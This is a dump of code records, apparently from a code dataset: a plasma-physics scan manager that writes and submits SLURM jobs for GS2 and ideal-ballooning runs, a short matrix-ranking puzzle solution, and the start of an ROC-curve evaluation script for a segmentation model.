sbatch_n.replace(f\"--cpus-per-task={self.inputs['sbatch']['cpus-per-task']}\",\"--cpus-per-task=1\")\n\t\t\t\tfilename = f\"ideal_{n}\"\n\t\t\t\tpyth = open(f\"{self.inputs['data_path']}/submit_files/{filename}.py\",'w')\n\t\t\t\tpyth.write(f\"\"\"import os, sys\n\t\t\t\t\ninput_files = {input_lists[n]}\n\nif __name__ == '__main__':\n\tslurm_id = int(sys.argv[1])\n\tinput_file = input_files[slurm_id]\n\tos.system(f\"echo \\\\\\\"Ideal Input: {{input_file}}\\\\\\\"\")\n\tos.system(f\"srun ideal_ball \\\\\\\"{{input_file}}\\\\\\\"\")\n\tif os.path.exists(f\\\"{{input_file[:-3]}}.ballstab2d\\\"):\n\t\tos.system(f\"touch \\\\\\\"{{input_file[:-3]}}.fin\\\\\\\"\")\"\"\")\n\t\t\t\tpyth.close()\n\t\t\t\t
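# Job file below: one sbatch array entry per input file; each array task\n\t\t\t\t# calls the python helper written above with its $SLURM_ARRAY_TASK_ID.\n\t\t\t\t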
jobfile = open(f\"{self.inputs['data_path']}/submit_files/{filename}.job\",'w')\n\t\t\t\tjobfile.write(f\"\"\"{sbatch_n}\n#SBATCH --array=0-{len(input_lists[n])-1}\n\n{compile_modules}\n\nwhich gs2\ngs2 --build-config\n\npython {self.inputs['data_path']}/submit_files/{filename}.py $SLURM_ARRAY_TASK_ID\"\"\")\n\t\t\t\tif n_par > n_sim and n + n_sim < n_par:\n\t\t\t\t\tjobfile.write(f\"\\nsbatch {self.inputs['data_path']}/submit_files/ideal_{n+n_sim}.job\")\n\t\t\t\tjobfile.close()\n\t\t\tfor n in range(n_sim):\n\t\t\t\tos.system(f\"sbatch \\\"{self.inputs['data_path']}/submit_files/ideal_{n}.job\\\"\")\n\t\tif self['system'] == 'archer2':\n\t\t\tif n_par is None:\n\t\t\t\tn_par = 1\n\t\t\tif n_sim is None:\n\t\t\t\tn_sim = n_par if n_par < 8 else 8\n\t\t\tif n_sim > 8:\n\t\t\t\tprint(\"Archer supports a maximum of n_sim = 8\")\n\t\t\t\tn_sim = 8\n\t\t\tos.makedirs(f\"{self.inputs['data_path']}/submit_files/\",exist_ok=True)\n\t\t\tinput_lists = {}\n\t\t\tfor n in range(n_par):\n\t\t\t\tinput_lists[n] = []\n\t\t\tif n_jobs == None or n_jobs*n_par > len(self._ideal_input_files):\n\t\t\t\ttotal_jobs = len(self._ideal_input_files)\n\t\t\telse:\n\t\t\t\ttotal_jobs = n_jobs*n_par\n\t\t\tinput_list = list(self._ideal_input_files)\n\t\t\tfor i in range(total_jobs):\n\t\t\t\tinput_lists[i%n_par].append(input_list[i])\n\t\t\t\tself._ideal_input_files.remove(input_list[i])\n\t\t\tfor n in range(n_par):\n\t\t\t\tsbatch_n = sbatch.replace(f\"{self.inputs['sbatch']['output']}\",f\"{self.inputs['sbatch']['output']}_ideal_{n}\")\n\t\t\t\tsbatch_n = sbatch_n.replace(f\"#SBATCH --nodes={self.inputs['sbatch']['nodes']}\",\"#SBATCH --nodes=1\")\n\t\t\t\tfilename = f\"ideal_{n}\"\n\t\t\t\tpyth = open(f\"{self.inputs['data_path']}/submit_files/{filename}.py\",'w')\n\t\t\t\tpyth.write(f\"\"\"import os\nfrom joblib import Parallel, delayed\nfrom time import sleep\n\ninput_files = {input_lists[n]}\n\ndef start_run(run):\n\tos.system(f\"echo \\\\\\\"Ideal Input: {{run}}\\\\\\\"\")\n\tos.system(f\"srun --nodes=1 --ntasks=1 ideal_ball \\\\\\\"{{run}}\\\\\\\"\")\n\tif os.path.exists(f\\\"{{run[:-3]}}.ballstab_2d\\\"):\n\t\tos.system(f\"touch \\\\\\\"{{run[:-3]}}.fin\\\\\\\"\")\n\telse:\n\t\tsleep(60)\n\t\tstart_run(run)\n\nParallel(n_jobs={self.inputs['sbatch']['ntasks-per-node']})(delayed(start_run)(run) for run in input_files)\"\"\")\n\t\t\t\tpyth.close()\n\t\t\t\tjobfile = open(f\"{self.inputs['data_path']}/submit_files/{filename}.job\",'w')\n\t\t\t\tjobfile.write(f\"\"\"{sbatch_n}\n\n{compile_modules}\n\nwhich gs2\ngs2 --build-config\n\npython {self.inputs['data_path']}/submit_files/{filename}.py &\n\nwait\"\"\")\n\t\t\t\tif n_par > n_sim and n + n_sim < n_par:\n\t\t\t\t\tjobfile.write(f\"\\nsbatch {self.inputs['data_path']}/submit_files/ideal_{n+n_sim}.job\")\n\t\t\t\tjobfile.close()\n\t\t\tfor n in range(n_sim):\n\t\t\t\tos.system(f\"sbatch \\\"{self.inputs['data_path']}/submit_files/ideal_{n}.job\\\"\")\n\t\n\tdef make_ideal_files(self, directory = None, specificRuns = None, checkSetup = True):\n\t\tif checkSetup:\n\t\t\tif not self.check_setup():\n\t\t\t\treturn\n\t\tif directory is None:\n\t\t\tdirectory = self.inputs['data_path']\n\t\tif specificRuns:\n\t\t\truns = specificRuns\n\t\telse:\n\t\t\tcheck = self.check_complete(directory = directory, doPrint = False, gyro = False, ideal = True)\n\t\t\tif check['ideal_complete']:\n\t\t\t\tprint(f\"{len(check['ideal_complete'])} Existing Ideal Runs Detected\")\n\t\t\truns = check['ideal_incomplete']\n\t\t\t\n\t\tfor run in runs:\n\t\t\tsub_dir = 
self.get_ideal_run_directory(run)\n\t\t\tos.makedirs(sub_dir,exist_ok=True)\n\t\t\t\n\t\t\texisting_inputs = [] \n\t\t\tfor f in glob.glob(r'itteration_*.in'):\n\t\t\t\texisting_inputs.append([x for x in f if x.isdigit()])\n\t\t\titt = max([eval(\"\".join(x)) for x in existing_inputs],default=-1) + 1\n\t\t\tfilename = f\"itteration_{itt}\"\n\t\t\t\n\t\t\tnml = self.eqbm.get_surface_input(psiN = run['psin'])\n\t\t\tnml['ballstab_knobs']['theta0'] = run['theta0']\n\t\t\tnml.write(f\"{sub_dir}/{filename}.in\", force=True)\n\t\t\tself._ideal_input_files.add(f\"{sub_dir}/{filename}.in\")\n\t\n\tdef get_all_runs(self):\n\t\tdef loop(n,variables={},runs=[]):\n\t\t\tif n == 0:\n\t\t\t\treturn [{}]\n\t\t\tdim = self.dimensions[self.inputs.dim_order[len(self.dimensions)-n]]\n\t\t\tfor val in dim.values:\n\t\t\t\tvariables[dim.name] = val\n\t\t\t\tif n>1:\n\t\t\t\t\tloop(n=n-1,variables=variables)\n\t\t\t\telse:\n\t\t\t\t\truns.append(variables.copy())\n\t\t\tif n == len(self.dimensions):\n\t\t\t\treturn runs\n\t\treturn loop(n=len(self.dimensions))\n\t\n\tdef get_all_ideal_runs(self):\n\t\truns = []\n\t\tif 'theta0' in self.dimensions:\n\t\t\ttheta0s = self.dimensions['theta0'].values\n\t\telif 'theta0' in self.single_parameters:\n\t\t\ttheta0s = self.single_parameters['theta0'].values\n\t\telse:\n\t\t\ttheta0s = [0]\n\t\t\n\t\tif 'psin' in self.dimensions:\n\t\t\tpsins = self.dimensions['psin'].values\n\t\telse:\n\t\t\tpsins = self.single_parameters['psin'].values\n\t\t\n\t\tfor psiN in psins:\n\t\t\tfor theta0 in theta0s:\n\t\t\t\truns.append({'psin': psiN, 'theta0': theta0})\n\t\treturn runs\n\t\t\t\t\n\tdef make_gyro_files(self, directory = None, checkSetup = True, specificRuns = None, group_runs = None):\n\t\tif checkSetup:\n\t\t\tif not self.check_setup():\n\t\t\t\treturn\n\t\tif directory is None:\n\t\t\tdirectory = self.inputs['data_path']\n\t\tif not specificRuns:\n\t\t\tcheck = self.check_complete(directory = directory, doPrint = False, gyro = True, ideal = False)\n\t\t\tif check['gyro_complete']:\n\t\t\t\tprint(f\"{len(check['gyro_complete'])} Existing Gyro Runs Detected\")\n\t\t\truns = check['gyro_incomplete']\n\t\telse:\n\t\t\truns = specificRuns\n\t\t\n\t\t\n\t\t\t\n\t\tfor run in runs:\n\t\t\tsub_dir = self.get_run_directory(run)\n\t\t\tos.makedirs(sub_dir,exist_ok=True)\n\t\t\texisting_inputs = [] \n\t\t\tfor f in glob.glob(r'itteration_*.in'):\n\t\t\t\texisting_inputs.append([x for x in f if x.isdigit()])\n\t\t\titt = max([eval(\"\".join(x)) for x in existing_inputs],default=-1)\n\t\t\tif itt < self.inputs['itteration']:\n\t\t\t\tfilename = f\"itteration_{self.inputs['itteration']}\"\n\t\t\t\tsubnml = self.eqbm.get_gyro_input(run = run)\n\t\t\t\tsubnml.write(f\"{sub_dir}/{filename}.in\", force=True)\n\t\t\telse:\n\t\t\t\tfilename = f\"itteration_{itt}\"\n\t\t\t\t\n\t\t\tself._input_files.add(f\"{sub_dir}/{filename}.in\")\n\t\n\tdef get_run_directory(self, run):\n\t\tsub_dir = f\"{self.inputs['data_path']}/gyro_files/\" + \"/\".join([f\"{name} = {run[name]:.4g}\" for name in self.inputs.dim_order])\n\t\treturn sub_dir\n\t\n\tdef get_ideal_run_directory(self, run):\n\t\tif 'psin' not in run and 'psin' not in self.single_parameters:\n\t\t\tprint(\"ERROR: psin not given\")\n\t\t\treturn None\n\t\telif 'psin' not in run and 'psin' in self.single_parameters:\n\t\t\trun['psin'] = self.single_parameters['psin'].values[0]\n\t\tif 'theta0' not in run and 'theta0' not in self.single_parameters and 'theta0' not in self.dimensions:\n\t\t\trun['theta0'] = 0\n\t\telif 'theta0' not in run and 
'theta0' in self.single_parameters:\n\t\t\trun['theta0'] = self.single_parameters['theta0'].values[0]\n\t\telif 'theta0' not in run and 'theta0' in self.dimensions:\n\t\t\tprint(\"ERROR: theta0 not given\")\n\t\t\treturn None\n\t\t\n\t\tsub_dir = f\"{self.inputs['data_path']}/ideal_files/\" + \"/\".join([f\"{name} = {run[name]:.4g}\" for name in ['psin','theta0']])\n\t\treturn sub_dir\n\t\n\tdef update_itteration(self):\n\t\tself.inputs['info']['itteration'] = self.inputs['itteration'] + 1\n\t\tprint(f\"Updated to itteration {self.inputs['itteration']}\")\n\t\n\tdef create_run_info(self):\n\t\tself.inputs.create_run_info()\n\t\n\tdef check_complete(self, directory = None, doPrint = True, ideal = None, gyro = None):\n\t\tif self.inputs['data_path'] is None:\n\t\t\tself.inputs.create_run_info()\n\t\tif directory is None:\n\t\t\tdirectory = self.inputs['data_path']\n\t\t\t\n\t\tif gyro is None:\n\t\t\tgyro = self['gyro']\n\t\telif type(gyro) != bool:\t\n\t\t\tprint(\"ERROR: gyro must be boolean\")\n\t\t\treturn\n\t\tif ideal is None:\n\t\t\tideal = self['ideal']\n\t\telif type(ideal) != bool:\n\t\t\tprint(\"ERROR: ideal must be boolean\")\n\t\t\treturn\n\t\t\n\t\tunfinished_gyro = []\n\t\tfinished_gyro = []\n\t\tif gyro:\n\t\t\tfor run in self.get_all_runs():\n\t\t\t\tsub_dir = self.get_run_directory(run)\n\t\t\t\tif self['system'] != 'archer2' and os.path.exists(f\"{sub_dir}/itteration_0.out.nc\"):\n\t\t\t\t\tfinished_gyro.append(run)\n\t\t\t\telif self['system'] == 'archer2' and os.path.exists(f\"{sub_dir}/itteration_0.fin\"):\n\t\t\t\t\tfinished_gyro.append(run)\n\t\t\t\telse:\n\t\t\t\t\tunfinished_gyro.append(run)\n\n\t\tunfinished_ideal = []\n\t\tfinished_ideal = []\n\t\tif ideal:\n\t\t\tfor run in self.get_all_ideal_runs():\n\t\t\t\tsub_dir = self.get_ideal_run_directory(run)\n\t\t\t\tif os.path.exists(f\"{sub_dir}/itteration_0.fin\"):\n\t\t\t\t\tfinished_ideal.append(run)\n\t\t\t\telse:\n\t\t\t\t\tunfinished_ideal.append(run)\n\t\t\n\t\tif doPrint:\n\t\t\tprint(f\"Gyro Runs Complete: {len(finished_gyro)} | Incomplete : {len(unfinished_gyro)}\")\n\t\t\tprint(f\"Ideal Runs Complete: {len(finished_ideal)} | Incomplete : {len(unfinished_ideal)}\")\n\t\t\treturn\n\t\telse:\n\t\t\treturn {'gyro_complete': finished_gyro, 'gyro_incomplete': unfinished_gyro, 'ideal_complete': finished_ideal, 'ideal_incomplete': unfinished_ideal}\n\t\n\tdef _save_obj(self, filename = None, directory = None):\n\t\tif filename is None:\n\t\t\tfilename = \"scan.obj\"\n\t\tif directory is None:\n\t\t\tdirectory = self.path\n\t\timport pickle\n\t\ttemp = self.eqbm.pyro\n\t\tself.eqbm.pyro = None\n\t\twith open(filename,'wb') as obj:\n\t\t\tpickle.dump(self,obj)\n\t\tself.eqbm.pyro = temp\n\n\tdef _save_nml_diff(self, filename = None, directory = None):\n\t\tif filename is None:\n\t\t\tfilename = \"nml_diffs\"\n\t\tif directory is None:\n\t\t\tdirectory = self.inputs['data_path']\n\t\tsavez(f\"{directory}/{filename}\", name_diffs = self.namelist_diffs)\n\t\n\tdef quick_save(self, filename = None, directory = None, SlurmSave = False):\n\t\tself.save_out(filename = filename, directory = directory, SlurmSave = SlurmSave, QuickSave = True)\n\tdef save_out(self, filename = None, directory = None, SlurmSave = False, QuickSave = False):\n\t\tif filename is None and self.inputs['run_name'] is None:\n\t\t\tfilename = input(\"Output File Name: \")\n\t\t\tfilename = filename.split(\".\")[0]\n\t\telif filename is None:\n\t\t\tfilename = self.inputs['run_name']\n\t\t\t\n\t\tif self.inputs['data_path'] is 
None:\n\t\t\tself.inputs.create_run_info()\n\t\tif directory is None:\n\t\t\tdirectory = self.path\n\t\t\n\t\tif not self['gyro'] and not self['ideal']:\n\t\t\tprint(\"Error: Both Gyro and Ideal are False\")\n\t\t\treturn\n\t\t\n\t\tif self['system'] in ['viking','archer2'] and not SlurmSave:\n\t\t\tsave_modules = systems[self['system']]['save_modules']\n\t\t\tself._save_nml_diff()\n\t\t\tsbatch = \"#!/bin/bash\"\n\t\t\tfor key, val in self.inputs['sbatch_save'].items():\n\t\t\t\tif key == 'output' and '/' not in val:\n\t\t\t\t\tval = f\"{self.inputs['data_path']}/submit_files/{val}\"\n\t\t\t\tsbatch = sbatch + f\"\\n#SBATCH --{key}={val}\"\n\t\t\tjob = open(f\"{self.inputs['data_path']}/submit_files/save_out.job\",'w')\n\t\t\tjob.write(f\"\"\"{sbatch}\n\n{save_modules}\n\npython {self.inputs['data_path']}/submit_files/save_out.py\"\"\")\n\t\t\tjob.close()\n\t\t\tpyth = open(f\"{self.inputs['data_path']}/submit_files/save_out.py\",'w')\n\t\t\tpyth.write(f\"\"\"from Myrokinetics import myro_scan\nfrom numpy import load\nwith load(\\\"{self.inputs['data_path']}/nml_diffs.npz\\\",allow_pickle = True) as obj:\n\tnd = obj['name_diffs']\n\trun = myro_scan(input_file = \\\"{self.inputs.input_name}\\\", directory = \\\"{self.inputs['files']['input_path']}\\\")\n\trun.namelist_diffs = nd\n\trun.save_out(filename = \\\"{filename}\\\", directory = \\\"{directory}\\\",SlurmSave = True,QuickSave = {QuickSave})\"\"\")\n\t\t\tpyth.close()\n\t\t\tos.system(f\"sbatch \\\"{self.inputs['data_path']}/submit_files/save_out.job\\\"\")\n\t\t\treturn\n\t\t\t\n\t\tif not self.check_setup():\n\t\t\treturn\n\t\t\t\n\t\t\n\t\tpsi_itt = self.single_parameters['psin'].values if 'psin' in self.single_parameters else self.dimensions['psin'].values\n\t\tequilibrium = {}\n\t\tfor psiN in psi_itt:\n\t\t\tequilibrium[psiN] = {}\n\t\t\tnml = self.eqbm.get_surface_input(psiN)\n\t\t\tequilibrium[psiN]['shear'] = nml['theta_grid_eik_knobs']['s_hat_input']\n\t\t\tequilibrium[psiN]['beta_prime'] = nml['theta_grid_eik_knobs']['beta_prime_input']\n\t\t\n\t\tif self['gyro']:\n\t\t\tgyro_data = {}\n\t\t\tgroup_data = {}\n\t\t\tonly = set({'omega','kx','ky'})\n\t\t\tif not QuickSave:\n\t\t\t\tonly = only | set({'phi','bpar','apar','phi2','t','theta', 'gds2', 'jacob','ql_metric_by_mode', 'phi2_by_mode'})\n\t\t\t#if self.inputs['epar']:\n\t\t\t\t#only = only | set({'epar'}) NOT CURRENTLY WORKING\n\t\t\tdata_keys = ['growth_rate','mode_frequency','omega','phi','bpar','apar','epar','phi2','parity','ql_metric']\n\t\t\tgroup_keys = ['phi2_avg','t','theta', 'gds2', 'jacob']\n\t\t\tgyro_keys = {}\n\t\t\tfor dim in self.dimensions.values():\n\t\t\t\tgyro_keys[dim.name] = {}\n\t\t\t\tfor val in dim.values:\n\t\t\t\t\tgyro_keys[dim.name][val] = set()\n\t\t\tif self.inputs['grid_option'] == 'box':\n\t\t\t\tkxs = set()\n\t\t\t\tkys = set()\n\t\t\t\tgyro_keys['ky'] = {}\n\t\t\t\tgyro_keys['kx'] = {}\n\t\t\t\n\t\t\truns = self.get_all_runs()\n\t\t\tfor run in runs:\n\t\t\t\tsub_dir = self.get_run_directory(run)\n\t\t\t\ttry:\n\t\t\t\t\texisting_inputs = [] \n\t\t\t\t\tfor f in glob.glob(r'itteration_*.in'):\n\t\t \t\t\texisting_inputs.append([x for x in f if x.isdigit()])\n\t\t\t\t\titt = max([eval(\"\".join(x)) for x in existing_inputs],default=0)\n\t\t\t\t\trun_data = readnc(f\"{sub_dir}/itteration_{itt}.out.nc\",only=only)\t\n\t\t\t\t\tgroup_key = run_data['attributes']['id']\n\t\t\t\t\tgroup_data[group_key] = {}\n\t\t\t\t\tfor key in group_keys:\n\t\t\t\t\t\tgroup_data[group_key][key] = None\n\t\t\t\t\tfor xi, kx in 
enumerate(run_data['kx']):\n\t\t\t\t\t\tfor yi, ky in enumerate(run_data['ky']):\n\t\t\t\t\t\t\trun_key = str(uuid4())\n\t\t\t\t\t\t\tgyro_data[run_key] = deepcopy(run)\n\t\t\t\t\t\t\tfor key in run:\n\t\t\t\t\t\t\t\tgyro_keys[key][run[key]].add(run_key)\n\t\t\t\t\t\t\tgyro_data[run_key]['group_key'] = group_key\n\t\t\t\t\t\t\tif self.inputs['grid_option'] == 'box':\n\t\t\t\t\t\t\t\tkxs.add(kx)\n\t\t\t\t\t\t\t\tkys.add(ky)\n\t\t\t\t\t\t\t\tif ky not in gyro_keys['ky']:\n\t\t\t\t\t\t\t\t\tgyro_keys['ky'][ky] = set()\n\t\t\t\t\t\t\t\tif kx not in gyro_keys['kx']:\n\t\t\t\t\t\t\t\t\tgyro_keys['kx'][kx] = set()\n\t\t\t\t\t\t\t\tgyro_keys['ky'][ky].add(run_key)\n\t\t\t\t\t\t\t\tgyro_keys['kx'][kx].add(run_key)\n\t\t\t\t\t\t\tif 'kx' not in gyro_data[run_key]:\n\t\t\t\t\t\t\t\tgyro_data[run_key]['kx'] = kx\n\t\t\t\t\t\t\tif 'ky' not in gyro_data[run_key]:\n\t\t\t\t\t\t\t\tgyro_data[run_key]['ky'] = ky\n\t\t\t\t\t\t\t#gyro_data['nml_diffs'] = self.namelist_diffs[?]\n\t\t\t\t\t\t\tfor key in data_keys:\n\t\t\t\t\t\t\t\tgyro_data[run_key][key] = None\n\t\t\t\t\t\t\tfor key in only:\n\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\tkey_data = run_data[key]\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tif key == 'omega':\n\t\t\t\t\t\t\t\t\t\tom = key_data[-1,yi,xi]\n\t\t\t\t\t\t\t\t\t\tif type(om) != complex:\n\t\t\t\t\t\t\t\t\t\t\tom = key_data[-2,yi,xi]\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['growth_rate'] = imag(om)\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['mode_frequency'] = real(om)\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['omega'] = key_data[:,yi,xi].tolist()\n\t\t\t\t\t\t\t\t\telif key in ['phi','apar','bpar']:\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key][key] = key_data[yi,xi,:].tolist()\n\t\t\t\t\t\t\t\t\t\tif key == 'phi':\n\t\t\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\t\t\tsymsum = sum(abs(key_data[yi,xi,:] + key_data[yi,xi,::-1]))/sum(abs(key_data[yi,xi,:]))\n\t\t\t\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t\t\t\tsymsum = 1\n\t\t\t\t\t\t\t\t\t\t\tif symsum > 1.5:\n\t\t\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['parity'] = 1\n\t\t\t\t\t\t\t\t\t\t\telif symsum < 0.5:\n\t\t\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['parity'] = -1\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['parity'] = 0\n\t\t\t\t\t\t\t\t\telif key in ['t','theta', 'gds2', 'jacob']:\n\t\t\t\t\t\t\t\t\t\tgroup_data[group_key][key] = key_data.tolist()\n\t\t\t\t\t\t\t\t\telif key in ['phi2']:\n\t\t\t\t\t\t\t\t\t\tgroup_data[group_key]['phi2_avg'] = key_data.tolist()\n\t\t\t\t\t\t\t\t\telif key in ['ql_metric_by_mode']:\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['ql_metric'] = key_data[-1,yi,xi]\n\t\t\t\t\t\t\t\t\telif key in ['phi2_by_mode']:\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['phi2'] = key_data[:,yi,xi]\n\t\t\t\t\t\t\t\t\telif key in ['epar']:\n\t\t\t\t\t\t\t\t\t\tepar_path = f\"{sub_dir}/itteration_{itt}.epar\"\n\t\t\t\t\t\t\t\t\t\tepar_data = loadtxt(epar_path)\n\t\t\t\t\t\t\t\t\t\tepar = []\n\t\t\t\t\t\t\t\t\t\tfor l in range(len(epar_data[:,3])):\n\t\t\t\t\t\t\t\t\t\t\tepar.append(complex(epar_data[l,3],epar_data[l,4]))\n\t\t\t\t\t\t\t\t\t\tepar = array(epar)\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['epar'] = epar\n\t\t\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\t\t\tprint(f\"Save Error in {sub_dir}/itteration_{itt}: {e}\")\n\t\t\t\t\t\t\t\t\tif key == 'omega':\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['growth_rate'] = nan\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['mode_frequency'] = nan\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(f\"Save Error {sub_dir}/itteration_{itt}: {e}\")\n\t\t\tif 
self.inputs['grid_option'] == 'box':\n\t\t\t\texisting_dim_keys = []\n\t\t\t\tfor key in [x for x in self.inputs.inputs.keys() if 'dimension_' in x]:\n\t \t\t\texisting_dim_keys.append([x for x in key if x.isdigit()])\n\t\t\t\tdim_n = max([eval(\"\".join(x)) for x in existing_dim_keys],default=1) + 1\n\t\t\t\tkxs = list(kxs)\n\t\t\t\tkxs.sort()\n\t\t\t\tself.inputs.inputs[f'dimension_{dim_n}'] = {'type': 'kx', 'values': kxs, 'min': min(kxs), 'max': max(kxs), 'num': len(kxs), 'option': None}\n\t\t\t\tkys = list(kys)\n\t\t\t\tkys.sort()\n\t\t\t\tself.inputs.inputs[f'dimension_{dim_n+1}'] = {'type': 'ky', 'values': kys, 'min': min(kys), 'max': max(kys), 'num': len(kys), 'option': None}\n\t\t\t\tself.inputs.load_dimensions()\n\t\telse:\n\t\t\tgyro_data = None\n\t\t\tgyro_keys = None\n\n\t\tif self['ideal']:\n\t\t\tideal_keys = {}\n\t\t\tif 'theta0' in self.single_parameters:\n\t\t\t\ttheta0_itt = self.single_parameters['theta0'].values \n\t\t\tif 'theta0' in self.dimensions:\n\t\t\t\ttheta0_itt = self.dimensions['theta0'].values\n\t\t\telse:\n\t\t\t\ttheta0_itt = [0]\n\t\t\t\n\t\t\tideal_keys['psin'] = {}\n\t\t\tideal_keys['theta0'] = {}\n\t\t\tfor val in psi_itt:\n\t\t\t\tideal_keys['psin'][val] = set()\n\t\t\tfor val in theta0_itt:\n\t\t\t\tideal_keys['theta0'][val] = set()\n\n\t\t\tideal_data = {}\n\t\t\tfor run in self.get_all_ideal_runs():\n\t\t\t\trun_id = str(uuid4())\n\t\t\t\tfor key in run:\n\t\t\t\t\tideal_keys[key][run[key]].add(run_id)\n\t\t\t\tideal_data[run_id] = {}\n\t\t\t\ttry:\n\t\t\t\t\tsub_dir = self.get_ideal_run_directory(run)\n\t\t\t\t\texisting_inputs = [] \n\t\t\t\t\tfor f in glob.glob(r'itteration_*.in'):\n\t\t\t\t\t\texisting_inputs.append([x for x in f if x.isdigit()])\n\t\t\t\t\titt = max([eval(\"\".join(x)) for x in existing_inputs],default=0)\n\n\t\t\t\t\tshear = loadtxt(f\"{sub_dir}/itteration_{itt}.ballstab_shat\")\n\t\t\t\t\tbp = loadtxt(f\"{sub_dir}/itteration_{itt}.ballstab_bp\")\n\t\t\t\t\tstab = loadtxt(f\"{sub_dir}/itteration_{itt}.ballstab_2d\")\n\t\t\t\t\t\n\t\t\t\t\tideal_data[run_id]['beta_prime'] = [abs(x) for x in bp]\n\t\t\t\t\tideal_data[run_id]['shear'] = shear.tolist()\n\t\t\t\t\tideal_data[run_id]['stabilities'] = transpose(stab).tolist()\n\t\t\t\texcept:\n\t\t\t\t\tideal_data[run_id]['beta_prime'] = None\n\t\t\t\t\tideal_data[run_id]['shear'] = None\n\t\t\t\t\tideal_data[run_id]['stabilities'] = None\n\t\t\t\t\tprint(f\"Save Error for ideal run: {run}\")\n\t\telse:\n\t\t\tideal_data = None\n\t\t\tideal_keys = None\n\t\t\n\t\tdata = {'gyro': gyro_data,\n\t\t\t'ideal': ideal_data,\n\t\t\t'group': group_data,\n\t\t\t'equilibrium': equilibrium,\n\t\t\t'_gyro_keys': gyro_keys,\n\t\t\t'_ideal_keys': ideal_keys,\n\t\t\t}\n\t\t\n\t\tself.file_lines = {'eq_file': self.eqbm._eq_lines, 'kin_file': self.eqbm._kin_lines, 'template_file': self.eqbm._template_lines}\n\t\tsavez(f\"{directory}/{filename}\", inputs = self.inputs.inputs, data = data, files = self.file_lines)\n\t\n\t'''\n\tdef rerun(self, runs = None, nml = None, directory = None, group_runs = None):\n\t\tif runs is None:\n\t\t\tprint(\"ERROR: runs not given\")\n\t\t\treturn\n\t\tif nml is None:\n\t\t\tprint(\"ERROR: nml not given, if you wish to rerun with no changes please use nml = {}\")\n\t\t\treturn\n\t\t\t\n\t\tself.check_setup()\n\t\t\n\t\tif type(nml) == str:\n\t\t\tnml = f90nml.read(nml)\n\t\tfor p,i,j,k,t in runs:\n\t\t\tself.namelist_diffs[p][i][j][k][t] = nml\n\t\tself.inputs.inputs['itteration'] += 1\n\t\tself.make_gyro_files(specificRuns = runs, directory = directory, group_runs = 
group_runs)\n\t\tself.run_jobs()\n\t\t\n\tdef load_run_set(self, filename = None):\n\t\tif filename is None:\n\t\t\tprint(\"ERROR: filename not given\")\n\t\t\treturn\n\t\t\n\t\truns = set()\t\t\n\t\twith open(filename) as f:\n\t\t\tlines = f.readlines()\n\t\t\tfor line in lines:\n\t\t\t\tp,i,j,k,t = [eval(x) for x in line.strip(\"\\n\").split(\"_\")]\n\t\t\t\truns.add((p,i,j,k,t))\n\t\treturn runs\n\t'''\n","repo_name":"Charlie-Nicholls/Myrokinetics","sub_path":"scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":31196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74860225126","text":"import sys\nimport heapq\n'''\n4 3\n20 -21 14\n-19 4 19\n22 -47 24\n-19 4 19\n'''\nM, N = map(int, sys.stdin.readline().rstrip().split(\" \"))\nmatrix = [[0] * N for _ in range(M)]\nresult = [[1] * N for _ in range(M)]\nheap = []\n\nfor i in range(M):\n tmp = list(sys.stdin.readline().rstrip().split(\" \"))\n for j in range(N):\n matrix[i][j] = (int)(tmp[j])\n heapq.heappush(heap, (matrix[i][j], (i, j)))\n\nwhile heap:\n value, (i, j) = heapq.heappop(heap)\n\n for k in range(M):\n if k != i:\n if value < matrix[k][j]:\n result[k][j] = max(result[i][j] + 1, result[k][j])\n else:\n continue\n\n for k in range(N):\n if k != j:\n if value < matrix[i][k]:\n result[i][k] = max(result[i][j] + 1, result[i][k])\n else:\n continue\n\nfor i in range(M):\n for j in range(N):\n print(result[i][j], end=\" \")\n print()\n\n\n\n","repo_name":"gooriiie/PythonAlgorithm","sub_path":"ChangeMatrix.py","file_name":"ChangeMatrix.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71516561127","text":"# import the necessary packages\nfrom training import config\nimport numpy as np\nimport torch\nfrom training.dataset import MultiTaskDataset\nimport torchmetrics.functional as f\nimport pandas as pd\nfrom torch.utils.data import DataLoader\nimport cv2\nimport argparse\nfrom sklearn.metrics import roc_curve, roc_auc_score, confusion_matrix\nimport matplotlib.pyplot as plt\nimport os\n\ncolor = {'BCE15-006': 'aqua',\n\t\t'BCE': 'forestgreen',\n\t\t'dice': 'darkslateblue',\n\t\t'BCE15-6': 'deepskyblue',\n\t\t'BCE15': 'lawngreen',\n\t\t'Dice15-6': 'purple',\n\t\t'Dice15-006': 'orchid',\n\t\t'dice15': 'crimson',\n\t\t}\n\ndef plot_roc_curve(fpr, tpr, dir,auroc):\n\tplt.plot(fpr, tpr, color = color[dir], label=dir + ': ' + f'{auroc:.3f}')\n #plt.show()\n\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-l\", \"--letter\", type=str, required=True, help=\"letter of the fold in capital case\")\nap.add_argument(\"-p\", \"--path\", type=str, required=False, help=\"path to output trained model\", default=\"Rocs\")\nargs = vars(ap.parse_args())\n\n# load the image and mask filepaths in a sorted manner\nLETTER = args[\"letter\"]\nOUTPUT = 